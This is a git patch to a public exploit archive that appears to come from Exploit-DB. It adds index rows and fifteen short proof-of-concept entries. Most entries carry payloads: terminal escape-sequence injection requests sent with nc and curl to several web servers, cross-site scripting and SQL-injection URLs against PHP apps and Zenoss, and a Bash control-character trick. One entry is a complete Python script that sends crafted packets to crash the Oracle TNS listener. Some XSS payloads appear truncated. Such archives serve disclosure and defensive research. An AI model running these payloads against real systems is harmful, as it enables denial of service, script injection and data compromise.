From 1a66c6956ff93501bc9b42e58e94d2ed6738a9b3 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 27 May 2014 04:36:34 +0000 Subject: [PATCH] Updated 05_27_2014 --- files.csv | 15 +++ platforms/linux/local/33508.txt | 16 +++ platforms/multiple/dos/33506.py | 156 +++++++++++++++++++++++++++ platforms/multiple/remote/33497.txt | 13 +++ platforms/multiple/remote/33498.txt | 12 +++ platforms/multiple/remote/33499.txt | 10 ++ platforms/multiple/remote/33500.txt | 12 +++ platforms/multiple/remote/33503.txt | 13 +++ platforms/multiple/remote/33504.txt | 9 ++ platforms/multiple/webapps/33511.txt | 9 ++ platforms/php/webapps/33505.txt | 11 ++ platforms/php/webapps/33507.txt | 9 ++ platforms/php/webapps/33509.txt | 7 ++ platforms/php/webapps/33510.txt | 9 ++ platforms/windows/remote/33501.txt | 9 ++ platforms/windows/remote/33502.txt | 14 +++ 16 files changed, 324 insertions(+) create mode 100755 platforms/linux/local/33508.txt create mode 100755 platforms/multiple/dos/33506.py create mode 100755 platforms/multiple/remote/33497.txt create mode 100755 platforms/multiple/remote/33498.txt create mode 100755 platforms/multiple/remote/33499.txt create mode 100755 platforms/multiple/remote/33500.txt create mode 100755 platforms/multiple/remote/33503.txt create mode 100755 platforms/multiple/remote/33504.txt create mode 100755 platforms/multiple/webapps/33511.txt create mode 100755 platforms/php/webapps/33505.txt create mode 100755 platforms/php/webapps/33507.txt create mode 100755 platforms/php/webapps/33509.txt create mode 100755 platforms/php/webapps/33510.txt create mode 100755 platforms/windows/remote/33501.txt create mode 100755 platforms/windows/remote/33502.txt diff --git a/files.csv b/files.csv index e4466735b..ecb831a19 100755 --- a/files.csv +++ b/files.csv @@ -30176,3 +30176,18 @@ id,file,description,date,author,platform,type,port 33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 33492,platforms/php/webapps/33492.txt,"kesako script SQL Injection",2014-05-24,Microsoft-dz,php,webapps,0 33495,platforms/windows/dos/33495.py,"Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.",2014-05-24,"Kaczinski Ramirez",windows,dos,0 +33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal <= 4.5.1 Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 +33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 +33499,platforms/multiple/remote/33499.txt,"thttpd <= 2.24 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33500,platforms/multiple/remote/33500.txt,"mini_httpd <= 1.18 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 +33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,windows,remote,0 +33502,platforms/windows/remote/33502.txt,"Yaws <= 1.55 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,windows,remote,0 +33503,platforms/multiple/remote/33503.txt,"Orion Application Server <= 2.0.7 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 +33504,platforms/multiple/remote/33504.txt,"Boa Webserver 0.94.x Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 +33505,platforms/php/webapps/33505.txt,"Docmint 1.0/2.1 'id' Parameter Cross Site Scripting Vulnerability",2010-01-12,Red-D3v1L,php,webapps,0 +33506,platforms/multiple/dos/33506.py,"Oracle Database CVE-2010-0071 Remote Listener Memory Corruption Vulnerability",2010-01-12,"Dennis Yurichev",multiple,dos,0 +33507,platforms/php/webapps/33507.txt,"Simple PHP Blog 0.5.x 'search.php' Cross-Site Scripting Vulnerability",2010-01-12,Sora,php,webapps,0 +33508,platforms/linux/local/33508.txt,"GNU Bash <= 4.0 'ls' Control Character Command Injection Vulnerability",2010-01-13,"Eric Piel",linux,local,0 +33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0 +33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0 +33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0 diff --git a/platforms/linux/local/33508.txt b/platforms/linux/local/33508.txt new file mode 100755 index 000000000..7e7942356 --- /dev/null +++ b/platforms/linux/local/33508.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/37776/info + +GNU Bash is prone to a command-injection vulnerability because it fails to adequately sanitize control characters in the 'ls' command. + +Attackers can exploit this issue to execute arbitrary commands in a bash terminal; other attacks may also be possible. + +The following example is available: + +1. mkdir $(echo -e 'couc\x08\x08asd') +2. ls + +Displays: +coasd/ + +Expected: +couc??asd/ \ No newline at end of file diff --git a/platforms/multiple/dos/33506.py b/platforms/multiple/dos/33506.py new file mode 100755 index 000000000..6b3e85bd1 --- /dev/null +++ b/platforms/multiple/dos/33506.py @@ -0,0 +1,156 @@ +source: http://www.securityfocus.com/bid/37728/info + +Oracle Database is prone to a remote memory-corruption vulnerability in Listener. + +The vulnerability can be exploited over the 'Oracle Net' protocol. An attacker does not require privileges to exploit this vulnerability. + +This vulnerability affects the following supported versions: +9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.7 + +# TNS Listener (Oracle RDBMS) exploit, cause Listener process crash + +# While running on 11.1.0.7.0 win32, nsglvcrt() Listener function attempt +# to allocate huge memory block and copy *something* to it. + +# TID=3052|(1) MSVCR71.dll!malloc (0x4222fc5) (called from 0x438631 (TNSLSNR.EXE!nsglvcrt+0x95)) +# TID=3052|(1) MSVCR71.dll!malloc -> 0x2530020 +# TID=3052|(0) TNSLSNR.EXE!__intel_fast_memcpy (0x2530020, 0, 0x4222fc4) (called from 0x438647 (TNSLSNR.EXE!nsglvcrt+0xab)) + +# (addresses are for TNS Listener 11.1.0.7.0 win32 unpatched) +# If I correct, nsglvcrt() function is involved in new service creation. + +# Successfully crashed: +# Oracle RDBMS 11.1.0.6.0 win32 with CPUapr2009 applied +# Oracle RDBMS 11.1.0.7.0 win32 with CPUapr2009 applied +# Oracle RDBMS 10.2.0.4 win32 with CPUapr2009 applied +# Oracle RDBMS 10.2.0.2 Linux x86 +# Not crashed: +# Oracle RDBMS 11.2 Linux x86 + +# Vulnerability discovered by Dennis Yurichev + +# Fixed in CPUjan2010 as CVE-2010-0071 (CVSS 10.0): +# http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html + +from sys import * +from socket import * + +sockobj = socket(AF_INET, SOCK_STREAM) + +sockobj.connect ((argv[1], 1521)) + +sockobj.send( + "\x00\x68\x00\x00\x01\x00\x00\x00" + "\x01\x3A\x01\x2C\x00\x00\x20\x00" + "\x7F\xFF\xC6\x0E\x00\x00\x01\x00" + "\x00\x2E\x00\x3A\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x28\x43\x4F\x4E\x4E\x45" + "\x43\x54\x5F\x44\x41\x54\x41\x3D" + "\x28\x43\x4F\x4D\x4D\x41\x4E\x44" + "\x3D\x73\x65\x72\x76\x69\x63\x65" + "\x5F\x72\x65\x67\x69\x73\x74\x65" + "\x72\x5F\x4E\x53\x47\x52\x29\x29" +) + +data=sockobj.recv(102400) + +sockobj.send( + "\x02\xDE\x00\x00\x06\x00\x00\x00" + "\x00\x00\x00\x00\x02\xD4\x20\x08" + "\xFF\x03\x01\x00\x12\x34\x34\x34" + "\x34\x34\x78\x10\x10\x32\x10\x32" + "\x10\x32\x10\x32\x10\x32\x54\x76" + "\x00\x78\x10\x32\x54\x76\x44\x00" + "\x00\x80\x02\x00\x00\x00\x00\x04" + "\x00\x00\x70\xE4\xA5\x09\x90\x00" + "\x23\x00\x00\x00\x42\x45\x43\x37" + "\x36\x43\x32\x43\x43\x31\x33\x36" + "\x2D\x35\x46\x39\x46\x2D\x45\x30" + "\x33\x34\x2D\x30\x30\x30\x33\x42" + "\x41\x31\x33\x37\x34\x42\x33\x03" + "\x00\x65\x00\x01\x00\x01\x00\x00" + "\x00\x00\x00\x00\x00\x00\x64\x02" + "\x00\x80\x05\x00\x00\x00\x00\x04" + "\x00\x00\x00\x00\x00\x00\x01\x00" + "\x00\x00\x10\x00\x00\x00\x02\x00" + "\x00\x00\x84\xC3\xCC\x07\x01\x00" + "\x00\x00\x84\x2F\xA6\x09\x00\x00" + "\x00\x00\x44\xA5\xA2\x09\x25\x98" + "\x18\xE9\x28\x50\x4F\x28\xBB\xAC" + "\x15\x56\x8E\x68\x1D\x6D\x05\x00" + "\x00\x00\xFC\xA9\x36\x22\x0F\x00" + "\x00\x00\x60\x30\xA6\x09\x0A\x00" + "\x00\x00\x64\x00\x00\x00\x00\x00" + "\x00\x00\xAA\x00\x00\x00\x00\x01" + "\x00\x00\x17\x00\x00\x00\x78\xC3" + "\xCC\x07\x6F\x72\x63\x6C\x00\x28" + "\x48\x4F\x53\x54\x3D\x77\x69\x6E" + "\x32\x30\x30\x33\x29\x00\x01\x00" + "\x00\x00\x58\x00\x00\x00\x01\x00" + "\x00\x00\x50\xC5\x2F\x22\x02\x00" + "\x00\x00\x34\xC5\x2F\x22\x00\x00" + "\x00\x00\x9C\xC5\xCC\x07\x6F\x72" + "\x63\x6C\x5F\x58\x50\x54\x00\x09" + "\x00\x00\x00\x50\xC5\x2F\x22\x04" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x34" + "\xC5\xCC\x07\x6F\x72\x63\x6C\x5F" + "\x58\x50\x54\x00\x01\x00\x00\x00" + "\x05\x00\x00\x00\x01\x00\x00\x00" + "\x84\xC5\x2F\x22\x02\x00\x00\x00" + "\x68\xC5\x2F\x22\x00\x00\x00\x00" + "\xA4\xA5\xA2\x09\x6F\x72\x63\x6C" + "\x00\x05\x00\x00\x00\x84\xC5\x2F" + "\x22\x04\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\xFC\xC4\xCC\x07\x6F\x72\x63" + "\x6C\x00\x01\x00\x00\x00\x10\x00" + "\x00\x00\x02\x00\x00\x00\xBC\xC3" + "\xCC\x07\x04\x00\x00\x00\xB0\x2F" + "\xA6\x09\x00\x00\x00\x00\x00\x00" + "\x00\x00\x89\xC0\xB1\xC3\x08\x1D" + "\x46\x6D\xB6\xCF\xD1\xDD\x2C\xA7" + "\x66\x6D\x0A\x00\x00\x00\x78\x2B" + "\xBC\x04\x7F\x00\x00\x00\x64\xA7" + "\xA2\x09\x0D\x00\x00\x00\x20\x2C" + "\xBC\x04\x11\x00\x00\x00\x95\x00" + "\x00\x00\x02\x20\x00\x80\x03\x00" + "\x00\x00\x98\xC5\x2F\x22\x00\x00" + "\x00\x00\x00\x00\x00\x00\x0A\x00" + "\x00\x00\xB0\xC3\xCC\x07\x44\x45" + "\x44\x49\x43\x41\x54\x45\x44\x00" + "\x28\x41\x44\x44\x52\x45\x53\x53" + "\x3D\x28\x50\x52\x4F\x54\x4F\x43" + "\x4F\x4C\x3D\x42\x45\x51\x29\x28" + "\x50\x52\x4F\x47\x52\x41\x4D\x3D" + "\x43\x3A\x5C\x61\x70\x70\x5C\x41" + "\x64\x6D\x69\x6E\x69\x73\x74\x72" + "\x61\x74\x6F\x72\x5C\x70\x72\x6F" + "\x64\x75\x63\x74\x5C\x31\x31\x2E" + "\x31\x2E\x30\x5C\x64\x62\x5F\x31" + "\x5C\x62\x69\x6E\x5C\x6F\x72\x61" + "\x63\x6C\x65\x2E\x65\x78\x65\x29" + "\x28\x41\x52\x47\x56\x30\x3D\x6F" + "\x72\x61\x63\x6C\x65\x6F\x72\x63" + "\x6C\x29\x28\x41\x52\x47\x53\x3D" + "\x27\x28\x4C\x4F\x43\x41\x4C\x3D" + "\x4E\x4F\x29\x27\x29\x29\x00\x4C" + "\x4F\x43\x41\x4C\x20\x53\x45\x52" + "\x56\x45\x52\x00\x68\xC5\x2F\x22" + "\x34\xC5\x2F\x22\x00\x00\x00\x00" + "\x05\x00\x00\x00\x84\xC5\x2F\x22" + "\x04\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\xFC\xC4\xCC\x07\x6F\x72\x63\x6C" + "\x00\x09\x00\x00\x00\x50\xC5\x2F" + "\x22\x04\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x34\xC5\xCC\x07\x6F\x72\x63" + "\x6C\x5F\x58\x50\x54\x00" +) + +sockobj.close() + diff --git a/platforms/multiple/remote/33497.txt b/platforms/multiple/remote/33497.txt new file mode 100755 index 000000000..7243ddc32 --- /dev/null +++ b/platforms/multiple/remote/33497.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/37712/info + +AOLServer is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in a terminal. + +AOLServer 4.5.1 is vulnerable; other versions may also be affected. + +The following example is available: + +echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload +nc www.example.com 80 < payload + diff --git a/platforms/multiple/remote/33498.txt b/platforms/multiple/remote/33498.txt new file mode 100755 index 000000000..fc6b7881e --- /dev/null +++ b/platforms/multiple/remote/33498.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/37713/info + +Varnish is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in a terminal. + +Varnish 2.0.6 is vulnerable; other versions may also be affected. + +The following example is available: + +echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload +nc localhost 80 < payload \ No newline at end of file diff --git a/platforms/multiple/remote/33499.txt b/platforms/multiple/remote/33499.txt new file mode 100755 index 000000000..416cf311b --- /dev/null +++ b/platforms/multiple/remote/33499.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/37714/info + +Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in a terminal. + +This issue affects thttpd 2.25b and mini_httpd 1.19; other versions may also be affected. + +echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload +nc localhost 80 < payload diff --git a/platforms/multiple/remote/33500.txt b/platforms/multiple/remote/33500.txt new file mode 100755 index 000000000..9f1871835 --- /dev/null +++ b/platforms/multiple/remote/33500.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/37714/info + +Acme 'thttpd' and 'mini_httpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in a terminal. + +This issue affects thttpd 2.25b and mini_httpd 1.19; other versions may also be affected. + +curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a + +echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload +nc localhost 80 < payload \ No newline at end of file diff --git a/platforms/multiple/remote/33503.txt b/platforms/multiple/remote/33503.txt new file mode 100755 index 000000000..5d75579c2 --- /dev/null +++ b/platforms/multiple/remote/33503.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/37717/info + +Orion Application Server is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in a terminal. + +Orion Application Server 2.0.7 is vulnerable; other versions may also be affected. + + +curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a + +echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload +nc localhost 80 < payload \ No newline at end of file diff --git a/platforms/multiple/remote/33504.txt b/platforms/multiple/remote/33504.txt new file mode 100755 index 000000000..1c328b3df --- /dev/null +++ b/platforms/multiple/remote/33504.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37718/info + +Boa Webserver is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in a terminal. + +Boa Webserver 0.94.14rc21 is vulnerable; other versions may also be affected. + +curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a \ No newline at end of file diff --git a/platforms/multiple/webapps/33511.txt b/platforms/multiple/webapps/33511.txt new file mode 100755 index 000000000..9f6c3414f --- /dev/null +++ b/platforms/multiple/webapps/33511.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37802/info + +Zenoss is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Zenoss 2.3.3 is affected; other versions may be vulnerable as well. + +http://www.example.com/zport/dmd/Events/getJSONEventsInfo?severity=1&state=1&filter=& offset=0&count=60 into outfile "/tmp/z" \ No newline at end of file diff --git a/platforms/php/webapps/33505.txt b/platforms/php/webapps/33505.txt new file mode 100755 index 000000000..f662b59fb --- /dev/null +++ b/platforms/php/webapps/33505.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/37721/info + +Docmint is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Docmint 1.0 is vulnerable; versions 2.1 and higher are also vulnerable; other versions may be affected as well. + +http://www.example.com/index.php?id='"> +http://www.example.com/index.php?id=Th3 RDX/font> +http://www.example.com/index.php?id=Redirect...Redirect in corso... \ No newline at end of file diff --git a/platforms/php/webapps/33507.txt b/platforms/php/webapps/33507.txt new file mode 100755 index 000000000..bbe9e88c7 --- /dev/null +++ b/platforms/php/webapps/33507.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37752/info + +Simple PHP Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Simple PHP Blog 0.5.11 is vulnerable; other versions may also be affected. + +http://serverwww.example.com/blog/search.php?q=">

Hacked by Sora

\ No newline at end of file diff --git a/platforms/php/webapps/33509.txt b/platforms/php/webapps/33509.txt new file mode 100755 index 000000000..53ae0b97b --- /dev/null +++ b/platforms/php/webapps/33509.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/37798/info + +The Joomla! 'com_artistavenue' component is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/index.php?option=com_tienda&task=verproducto&categoria=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/33510.txt b/platforms/php/webapps/33510.txt new file mode 100755 index 000000000..00a6a679f --- /dev/null +++ b/platforms/php/webapps/33510.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37800/info + +Tribisur is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +The following example URI is available: + +http://www.example.com/forum.php?action=liste&cat=[Xss Vuln] \ No newline at end of file diff --git a/platforms/windows/remote/33501.txt b/platforms/windows/remote/33501.txt new file mode 100755 index 000000000..197739c5a --- /dev/null +++ b/platforms/windows/remote/33501.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37715/info + +Cherokee is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in a terminal. + +Cherokee 0.99.30 and prior are vulnerable. + +curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a \ No newline at end of file diff --git a/platforms/windows/remote/33502.txt b/platforms/windows/remote/33502.txt new file mode 100755 index 000000000..ce640b1cb --- /dev/null +++ b/platforms/windows/remote/33502.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/37716/info + +Yaws is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles. + +Attackers can exploit this issue to execute arbitrary commands in a terminal. + +Yaws 1.85 is vulnerable; other versions may also be affected. + +The following example is available: + +curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a +echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload +nc localhost 80 < payload +